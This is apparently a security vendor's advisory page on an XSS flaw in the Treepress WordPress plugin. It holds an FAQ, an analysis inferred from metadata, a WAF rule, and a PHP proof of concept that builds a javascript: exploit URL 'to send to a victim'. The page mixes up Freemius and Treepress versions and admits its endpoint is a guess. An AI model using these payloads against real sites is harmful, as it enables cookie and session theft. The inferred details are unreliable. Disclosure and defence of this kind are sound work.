What is CVE-2024-13362?

CVE-2024-13362 is a reflected DOM-based cross-site scripting (XSS) vulnerability found in the Treepress plugin for WordPress. It allows unauthenticated attackers to inject arbitrary JavaScript into web pages via the url parameter due to insufficient input sanitization.

How does the vulnerability work?

The vulnerability occurs when user-supplied input in the url parameter is not properly sanitized or escaped. An attacker can craft a malicious link that, when clicked by a victim, executes arbitrary JavaScript in their browser, potentially leading to session hijacking or other attacks.

Who is affected by this vulnerability?

WordPress sites using the Treepress plugin version 3.0.6 or earlier are affected by this vulnerability. Administrators should check their installed plugins to determine if they are using a vulnerable version.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the Treepress plugin installed. If it is version 3.0.6 or earlier, your site is at risk. Additionally, you can test for the vulnerability by attempting to inject a payload through the url parameter.

What is the CVSS score and what does it mean?

The CVSS score for CVE-2024-13362 is 6.1, which is classified as Medium severity. This indicates that while the vulnerability is not critical, it poses a significant risk that should be addressed promptly to prevent exploitation.

How can I fix or mitigate this vulnerability?

To fix this vulnerability, update the Treepress plugin to the latest version that addresses the issue. Additionally, ensure that the plugin implements proper input sanitization and output escaping for the url parameter.

What are the practical risks of this vulnerability?

The practical risks include the potential for attackers to execute arbitrary JavaScript in the victim’s browser, leading to session hijacking, cookie theft, or phishing attacks. Although the severity is rated as Medium, the risk increases when combined with social engineering tactics.

What does the proof of concept demonstrate?

The proof of concept illustrates how an attacker can construct a URL with a malicious payload that exploits the vulnerability. It shows that if the victim clicks the crafted link, the injected JavaScript executes in their browser, demonstrating the risk of the vulnerability.

What is reflected DOM-based XSS?

Reflected DOM-based XSS occurs when a web application includes untrusted data in the web page without proper validation or escaping. This type of XSS is executed immediately when the user clicks a link, as opposed to stored XSS, which is saved on the server.

Is user authentication required to exploit this vulnerability?

No, user authentication is not required to exploit this vulnerability. An attacker can craft a malicious link and send it to any user, who only needs to click the link for the attack to succeed.

What should I do if I cannot update the plugin immediately?

If you cannot update the plugin immediately, consider disabling the Treepress plugin until a fix can be applied. Additionally, educate users about the risks of clicking unknown links and monitor for any suspicious activity on your site.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : May 8, 2026

CVE-2024-13362: Freemius <= 2.10.1 – Reflected DOM-Based Cross-Site Scripting via url Parameter (treepress)

CVE ID CVE-2024-13362

Plugin treepress

Severity Medium (CVSS 6.1)

CWE 79

Vulnerable Version 3.0.6

Patched Version —

Disclosed April 29, 2026

Analysis Overview

Atomic Edge analysis of CVE-2024-13362 (metadata-based): This reflected DOM-based cross-site scripting vulnerability affects the Treepress plugin for WordPress, versions 3.0.6 and earlier. The vulnerability carries a CVSS score of 6.1 (Medium) and stems from improper neutralization of user-supplied input in the url parameter. An unauthenticated attacker can inject arbitrary web scripts, which execute in the victim’s browser upon clicking a crafted link.

The root cause likely involves insufficient sanitization and output escaping on the url parameter passed to a JavaScript-based component. The CWE-79 classification and the “DOM-Based” qualifier indicate the vulnerability resides in client-side JavaScript code that reads the url parameter from the URL (via location.search or a similar method) and writes it directly into the DOM without proper escaping. Atomic Edge analysis infers this from the description, as no source code diff is available. The plugin likely includes JavaScript files that process the url parameter for features like admin menu redirects or frontend page loads.

Exploitation requires no authentication and occurs over the network with low complexity. The attacker crafts a malicious link containing a url parameter with a payload like javascript:alert(document.cookie) or an event handler injection. The victim must click the link for the payload to execute. The exact endpoint is unclear, but a common pattern involves a shortcode or template tag that outputs JavaScript referencing the url parameter. An attacker could use a link like http://victim.site/?url=javascript%3Aalert(1) to trigger the XSS in the browser.

Remediation requires proper sanitization and output escaping on the url parameter. The developer must implement server-side validation, such as using esc_url_raw() before storing or outputting the parameter. For the JavaScript side, the parameter should be encoded with esc_js() or validated against an allowlist of permitted URL schemes (like http and https). Atomic Edge research recommends the fix encodes the output context (HTML attribute, JavaScript string) and validates the parameter is a legitimate URL path.

Successful exploitation allows an unauthenticated attacker to execute arbitrary JavaScript in the victim’s browser. This could lead to session hijacking, cookie theft, phishing page injection, or other client-side attacks. The CVSS scope change (S:C) indicates the injected script can affect resources beyond the vulnerable component, such as the parent WordPress admin session. The impact is limited to confidentiality and integrity loss of low severity, but combined with social engineering, it presents a significant risk.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2024-13362 (metadata-based)
# Block reflected DOM-based XSS via the 'url' parameter in Treepress plugin
# Targets the url parameter in GET requests (query string) with javascript: or other script schemes
SecRule ARGS:url "@rx ^(?i:javascript|vbscript|data|mailto):" 
  "id:20261993,phase:2,deny,status:403,log,chain,msg:'CVE-2024-13362 - Reflected DOM-Based XSS via url parameter in Treepress',severity:'CRITICAL',tag:'CVE-2024-13362',tag:'wordpress',tag:'treepress'"
  SecRule REQUEST_URI "@streq /wp-content/plugins/treepress/js/treepress-core.js" "chain"
    SecRule REQUEST_METHOD "@streq GET" "t:none"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2024-13362 - Freemius <= 2.10.1 - Reflected DOM-Based Cross-Site Scripting via url Parameter

// Configurable target URL (the vulnerable WordPress site)
$target_url = 'http://example.com/wp-content/plugins/treepress/js/some-script.js?url=';

// XSS payload that executes in the victim's browser
// This payload triggers a DOM-based XSS if the url parameter is not sanitized
$payload = 'javascript:alert(document.domain)';

// Encode the payload for URL transmission
$encoded_payload = urlencode($payload);

// Construct the exploit URL
$exploit_url = $target_url . $encoded_payload;

echo "[+] Atomic Edge CVE Research - Proof of Concept (metadata-based)n";
echo "[+] CVE-2024-13362 - Freemius <= 2.10.1 - Reflected DOM-Based XSSnn";
echo "[+] Exploit URL (send this to a victim):n";
echo $exploit_url . "nn";

// Simulate a request to verify the parameter is reflected in the response
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $exploit_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

if ($http_code == 200) {
    echo "[+] Request succeeded (HTTP 200). Check if the payload appears in the response below:nn";
    // Look for the payload in the response (a simple indicator of reflection)
    if (strpos($response, $payload) !== false) {
        echo "[!] PAYLOAD DETECTED in response - potential XSS vulnerability confirmed!n";
    } else {
        echo "[!] Payload not directly reflected. DOM-based XSS may still occur via JavaScript execution.n";
    }
    echo substr($response, 0, 500) . "...n";
} else {
    echo "[-] Request failed with HTTP code: " . $http_code . "n";
    echo "[-] The target may not be vulnerable or the endpoint is incorrect.n";
}

Frequently Asked Questions

What is CVE-2024-13362?
Understanding the vulnerability
CVE-2024-13362 is a reflected DOM-based cross-site scripting (XSS) vulnerability found in the Treepress plugin for WordPress. It allows unauthenticated attackers to inject arbitrary JavaScript into web pages via the url parameter due to insufficient input sanitization.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability occurs when user-supplied input in the url parameter is not properly sanitized or escaped. An attacker can craft a malicious link that, when clicked by a victim, executes arbitrary JavaScript in their browser, potentially leading to session hijacking or other attacks.
Who is affected by this vulnerability?
Identifying vulnerable installations
WordPress sites using the Treepress plugin version 3.0.6 or earlier are affected by this vulnerability. Administrators should check their installed plugins to determine if they are using a vulnerable version.
How can I check if my site is vulnerable?
Steps to verify vulnerability
To check if your site is vulnerable, verify the version of the Treepress plugin installed. If it is version 3.0.6 or earlier, your site is at risk. Additionally, you can test for the vulnerability by attempting to inject a payload through the url parameter.
What is the CVSS score and what does it mean?
Understanding severity ratings
The CVSS score for CVE-2024-13362 is 6.1, which is classified as Medium severity. This indicates that while the vulnerability is not critical, it poses a significant risk that should be addressed promptly to prevent exploitation.
How can I fix or mitigate this vulnerability?
Recommended remediation steps
To fix this vulnerability, update the Treepress plugin to the latest version that addresses the issue. Additionally, ensure that the plugin implements proper input sanitization and output escaping for the url parameter.
What are the practical risks of this vulnerability?
Potential impact on users
The practical risks include the potential for attackers to execute arbitrary JavaScript in the victim’s browser, leading to session hijacking, cookie theft, or phishing attacks. Although the severity is rated as Medium, the risk increases when combined with social engineering tactics.
What does the proof of concept demonstrate?
Understanding the exploit
The proof of concept illustrates how an attacker can construct a URL with a malicious payload that exploits the vulnerability. It shows that if the victim clicks the crafted link, the injected JavaScript executes in their browser, demonstrating the risk of the vulnerability.
What is reflected DOM-based XSS?
Explaining the XSS type
Reflected DOM-based XSS occurs when a web application includes untrusted data in the web page without proper validation or escaping. This type of XSS is executed immediately when the user clicks a link, as opposed to stored XSS, which is saved on the server.
Is user authentication required to exploit this vulnerability?
Access requirements
No, user authentication is not required to exploit this vulnerability. An attacker can craft a malicious link and send it to any user, who only needs to click the link for the attack to succeed.
What should I do if I cannot update the plugin immediately?
Interim measures
If you cannot update the plugin immediately, consider disabling the Treepress plugin until a fix can be applied. Additionally, educate users about the risks of clicking unknown links and monitor for any suspicious activity on your site.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations